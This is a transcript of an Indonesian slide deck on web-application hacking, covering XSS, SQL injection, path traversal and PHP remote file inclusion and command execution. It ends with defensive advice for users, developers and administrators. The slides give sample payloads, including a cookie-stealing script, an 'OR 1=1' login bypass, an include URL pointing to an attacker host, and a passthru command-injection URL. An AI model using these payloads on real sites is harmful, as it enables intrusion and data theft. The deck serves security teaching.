Ahmad Muammar W. K.

dokumen-dokumen yang mirip
Created by y3dips < >

Presented by z3r0byt3 Disusun oleh the_day & y3dips

Xcode Intensif Training. Advanced ethical web. hacking & security

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

Xcode Intensif Training. Ethical Web hacking & Security ~ Advanced

Keamanan Web Server. Pertemuan XI WEB HACKING

Andi Dwi Riyanto, M.Kom

PROTECTING WEBSITES FROM COMMON ATTACKS

Analisis Penanganan SQL Injection pada Basis Data MySQL dengan Framework Code Igniter dan PHP

TUGAS KELOMPOK SECURITY COMPUTER TOOL HACKING SQL INJECTION

Dasar Pemrograman Web. Pemrograman Web. Adam Hendra Brata

IMPLEMENTASI KEAMANAN APLIKASI WEB DENGAN WEB APPLICATION FIREWALL

Rekayasa Sistem Web. Teguh Wahyono. Fakultas Teknologi Informasi Semester Antara Tahun 2012/2013

Jurnal Ilmiah Komputer dan Informatika (KOMPUTA) 45 Edisi... Volume..., Bulan 20.. ISSN :

Tutorial Celah Keamanan Pada PHP Scripts. Oleh Ramdan Yantu

BAB V. Keamanan Sistem World Wide Web

MENGANALISA WEBSITE K E A M A N A N S I S T E M E R W I E N T J I P T A W I J A Y A, S T., M. K O M

Pertemuan 1. Pengenalan Dasar Web

ADITYA WARDANA

TEKNOLOGI APLIKASI WEB BERBASIS SERVER

STUDI DAN IMPLEMENTASI KEAMANAN WEBSITE MENGGUNAKAN OPEN WEB APPLICATION SECURITY PROJECT (OWASP) STUDI KASUS : PLN BATAM

Methods of Manual Penetration Testing (Actual Exploit)

Riska Kurnianto Abdullah NRP :

Keamanan Sistem World Wide Web. Pertemuan VI

rancang bangun aplikasi web vulnerability scanner terhadap kelemahan sql injection dan xss menggunakan java

Evaluasi Celah Keamanan Web Server pada LPSE Kota Palembang

Hal yang paling utama dalam proses pembuatan web server adalah memilih software mana yang akan digunakan sebagai web server yang akan digunan.

DAFTAR ISI. LEMBAR PENGESAHAN PEMBIMBING... iii. LEMBAR PENGESAHAN PENGUJI... iv. LEMBAR PERNYATAAN KEASLIAN... v. HALAMAN PERSEMBAHAN...

Pemrograman Basis Data Berbasis Web

Keamanan Sistem World Wide Web

XAMPP dan CMS (XAMPP Paket Apache, PHP dan MySQL Instant. Sistem Informasi Manajemen Sesi 9 STIE YASA ANGGANA GARUT

WWW (World Wide Web) Adalah salah satu bentuk layanan yang dapat diakses melalui internet. Biasa disingkat sebagai Web. Merupakan sekumpulan

Membangun Aplikasi Berbasis Web Dengan CodeIgniter Framework. Helmy Faisal Muttaqin

STMIK AMIKOM Yogyakarta. Keamanan Komputer: Web Security

Lebih kompatibel dengan Windows karena memang IIS adalah keluaran Microsoft.

Muhammad Zen Samsono Hadi, ST. Msc.

DATABASE SERVER WEB SERVER SUBDOMAIN

Pertemuan Ke-1 (Konsep Dasar Web) D3 Manajemen Informatika - Unijoyo 1

WEB1. Pertemuan Ke-1 (Konsep Dasar Web) S1 Teknik Informatika - Unijoyo 1

Pengantar E-Business dan E-Commerce

Secara umum, eksploit dapat dibagi atas dua jenis, yaitu eksploit lokal (local exploit), dan eksploit remote (remote exploit).

PEMROGRAMAN WEB. Agussalim

BAB 11 Keamanan WEB Pendahuluan 11.2 SSL

Web Server A. DASAR TEORI

Bab 4 Hasil dan Pembahasan

PENGERTIAN WEB web adalah

BAB III ANALISIS DAN PERANCANGAN

BAB II TINJAUAN PUSTAKA DAN DASAR TEORI. sebuah sistem pencarian lokasi kuliner berbasis mobile web untuk wilayah

Tugas III II5166 (Keamanan Informasi Lanjut)

Xcode Private Training. Network hacking & Security

WEB VULNERABILITIES ANALYSIS STUDI KASUS WEB DISBUN.MUBAKAB.GO.ID

AJAX. Pemrograman Web 1. Asynchronous JavaScript and XML. Genap

BAB 2 LANDASAN TEORI

TUGAS JARINGANN KOMPUTER

Asumsi dari penyedia layanan (website master) adalah sebagai berikut:

Xcode Intensif Training. Ethical Hacking

Pencari Celah Keamanan pada Aplikasi Web

KINERJA APLIKASI CLIENT SERVER UNTUK SISTEM INFORMASI TUMBUH KEMBANG BALITA

Internet & Web. Elfan Nofiari. Departemen Teknik Informatika Institut Teknologi Bandung. Page 1. IF-ITB/EN/1-Mar-04 IF3292 Internet & Web

Web Security Studi Kasus: PHP & MySQL. ARGA DINATA 29 September 2014

WEB SERVER LINUX DEBIAN 8.5

BAB 2 LANDASAN TEORI. Sitem adalah kumpulan dari elemen-elemen yang berinteraksi untuk mencapai tujuan. keluaran. Berikut gambaran umum sebuah sistem.

PENCARIAN DATA BUKU DI PERPUSTAKAAN BERBASIS PHP

Bab I Pendahuluan 1 BAB I PENDAHULUAN

Konsep Pemrograman Internet dan Web

SKRIPSI PENGUJIAN KETAHANAN WEBSITE MENGGUNAKAN FRAMEWORK ISSAF DAN OWASP

Keamanan Sistem WWW. Sejarah WWW

PENGEMBANGAN APLIKASI SISTEM PENGATURAN BASIS DATA SECARA ONLINE. Agustinus Noertjahyana, Rendy Pangestu dan Dwi Budiman

BAB 4 HASIL PENGUJIAN KEAMANAN SISTEM WEB SERVER PADA WEBSITE WALL STREET INSTITUTE INDONESIA

Pemrograman Web Teknik Informatika Fakultas Teknologi Industri

PENDETEKSI CELAH KEAMANAN PADA APLIKASI WEB DENGAN PENETRATION TESTING MENGGUNAKAN DATA VALIDATION TESTING SKRIPSI INDRA M.

Mengakses Microsoft SQL Server dengan PHP

KATA PENGANTAR. Assalamualaikum Wr. Wb.

PemWeb C. Pertemuan Ke-1 (Konsep Dasar Web) S1 Teknik Informatika - Unijoyo 1

Xcode Private Training. Advanced Network hacking & Security

MODUL 4 PHP PART 1 (PENGENALAN PHP + VARIABEL)

Keamanan Sistem WWW. WWW security

BAB 1 PENDAHULUAN. 1.1 Latar Belakang

BAB II LANDASAN TEORI. di jaman sekarang, namun apakah Anda mengetahui sejarah nya itu?. Mungkin,

BAB I PENDAHULUAN 1.1 Latar Belakang

Tugas MID Keamanan Jaringan Komputer

ANALISA KEAMANAN WEB SERVER MENGGUNAKAN WEB APPLICATION FIREWALL MODSECURITY. Artikel Ilmiah

BAB II TINJAUAN PUSTAKA. Suatu sistem adalah suatu jaringan kerja dari prosedur-prosedur yang saling

PEMROGRAMAN WEB 1. Pertemuan 1. Pengenalan dan Konsep Kerja Web 3/19/2013

Review Pemrograman Web I

BAB II LANDASAN TEORI. diperlukan dalam pembangunan website e-commerce Distro Baju MedanEtnic.

BAB III LANDASAN TEORI. Definisi sistem informasi adalah kumpulan. informasi didalam sebuah basis data menggunakan

Pengenalan Internet dan Protokol HTTP

Pemrograman Web I (Mengenal. Web) Oleh : Devie Rosa Anamisa

Hal yang harus diperhatikan dalam penggunaan AJAX adalah: XHTML dan CSS digunakan untuk menandai dan mempercantik tampilan informasi.

BAB III LANDASAN TEORI

MODUL 5 GET & POST Pemograman Web Teknik Informatika Universitas Pasundan Bandung 2016/2017

SINGLE SIGN ON (SSO) MENGGUNAKAN STANDAR SAML PADA SISTEM INFORMASI UNIKOM

Keamanan Sistem WWW. Muhammad Zidny Naf an

BAB 1 PENDAHULUAN. perubahan kultur kita sehari-hari. Dalam era yang disebut information age ini, media

BAB 2 LANDASAN TEORI. Bab ini akan menjelaskan masalah-masalah teoritis yang berkaitan dalam pembuatan

Ethical Hacking Advance. + BadUSB

Xcode Intensif Training Ethical. Hacking & Security (Advanced) 23/05/2016

Pengenalan Internet dan Protokol HTTP

SISTEM INFORMASI PELATIHAN LEMBAGA PENGEMBANGAN DAN PENJAMINAN MUTU PENDIDIKAN UNIVERSITAS DIPONEGORO SEMARANG

Transkripsi:

Ahmad Muammar W. K.

Details Web Hacking Threat Simulation Impact Discussion

Web Hacking Hacking melalui HTTP [ hacking over http ] Hacking terhadap Web Application Melalui port 80 ; port HTTP Memanfaatkan kelemahan dari web application Web browser attack Bypassing Firewall? Menggunakan HTTP rules (method) Get, Put, Post, Options, find, Delete, Trace

Hyper Text Transfer Protocol (HTTP) terletak pada bagian atas dari gambar Security level yaitu APLIKASI

http request (clear text/ ssl) Apache IIS Tomcat Netscape Plugins Perl PHP JSP E.t.c User Http reply (HTML, Javascript, VBscript) Firewall Web Server Web application MsSQL Postgre Mysql Oracle Database Server

Ahmad Muammar W. K.

Client side attack (xss, cookies stealing) Information Disclosure OS commanding (SQL, SSI, Ldap, Xpath ) Web Hacking Brute Force Denial Of Service Path travesal Remote command execution (php) Sumber: http://www.webappsec.org Etc

Client Side Attack Cross Site Scripting Suatu Jenis Serangan dengan cara memasukkan code/script HTML (javascript) kedalam suatu web site dan dijalankan melalui browser di client Contoh <script>alert(document.cookie)</script> Mendapatkan Cookies yang berisi info berharga milik client yang digunakan oleh server untuk proses authentikasi

Information Disclosure Predictable resource location Jenis serangan dengan menebak letak resource yang disembunyikan dan umum di gunakan oleh web aplikasi Contoh : /admin/ /backup/ /logs/ /PhpMyadmin/ admin.php login.php

SQL injection Suatu Cara untuk Mengexploitasi Web Application yang menggunakan suatu database, dan memasukan command sql,sehingga membentuk suatu query yang akan dieksekusi dan dijalankan oleh sql server. Contoh: http://victim.com/login.asp yang menerima input user dan pass attacking input user = test OR 1 = 1 && input pass =test Syntax SQL : select * from users where pass= test and user = test or 1 = 1 Passing the login box!!!

Path Traversal Suatu jenis vulnerabilities yang mengakibatkan user dapat melihat secara lengkap path suatu direktori atau file dari suatu situs/website Contoh : http://target.com/appx/sources/admin.php Fatal error: Call to undefined function: is_admin() in /var/www/html/user/target/appx/sources/admin.php on line 32 Diketahui bahwa halaman web target.com terletak di /var/www/html/user/target Kegunaan bagi attacker Mempersingkat waktu untuk mencari letak web direktori target Informasi tambahan jika telah memiliki akses ke server. = pwd pada situs target

Ahmad Muammar W. K.

PHP under attack* Remote file inclusion Remote Command execution *2 jenis serangan terhadap web aplikasi yang berbasis php

PHP under attack Remote File inclusion Suatu jenis serangan yang dilakukan dengan meng-include-kan halaman web lain kepada suatu situs/web aplikasi. Contoh Situs yang vulnerable http://victim.com/index.php?file=readme.txt URL code : http://victim.com/index.php?file=http://echo.or.id

victim http://echo.or.id

PHP under attack Shot! Modifikasi inclusion page <?php phpinfo();?> Change url http://echo.or.id > http://attacker.xxx/in.txt

Real site

PHP under attack Remote Command Execution Suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang vulnerable akan mengeksekusi request yang di kirimkan. Contoh Situs yang vulnerable http://victim.com/viewtopic.php?t=48 URL code: http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($http_get_vars[a]).%2527 &a=id;pwd

Ahmad Muammar W. K.

Most Impact Defacing Data Stolen Etc

Defacing Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (folder lain ; file lain)

Motives Dendam atau perasaan gak puas* Kenikmatan tersendiri, 'defacer' merasa tertantang Intrik politik, Sosial Penyampaian pesan Keuntungan Materill Prestice dalam kelompok

As a User Gunakan Firewall, Antivirus, Anti Trojan, Good Backup Facility dsb Penggunaan Password / pass phrase yang baik Berhati hati terhadap semua tawaran menggiurkan (attachment/program) Penggunaan fasilitas secara hati hati (warnet; public internet café) Penggunaan Secure login/secure connection (https ; ssh) Update Informasi

As a Developer Secure programming Gunakan Input Validation yang baik Gunakan Enkripsi untuk authentikasi dan proses lain yang di anggap perlu Matikan error_log ( kecuali saat development ) Sesuai Kebutuhan dan kemampuan! Update informasi secara general dan informasi specifik engine yang digunakan

As an Administrator Policy (strict restriction) Setting Optimal (Sesuai kebutuhan) pada environtment ; configurasi server Batasi Fungsi yang bisa berinteraksi dengan system environtment Php (passthru, system, exec) ; mssql (xp_cmdshell, xp_regdeletekey, xp_msver) Update Patch terbaru untuk application Selalu Update Informasi

Ahmad Muammar W. K.

2024 © DocPlayer.info Pengaturan dan alat privasi | Ketentuan | Tanggapan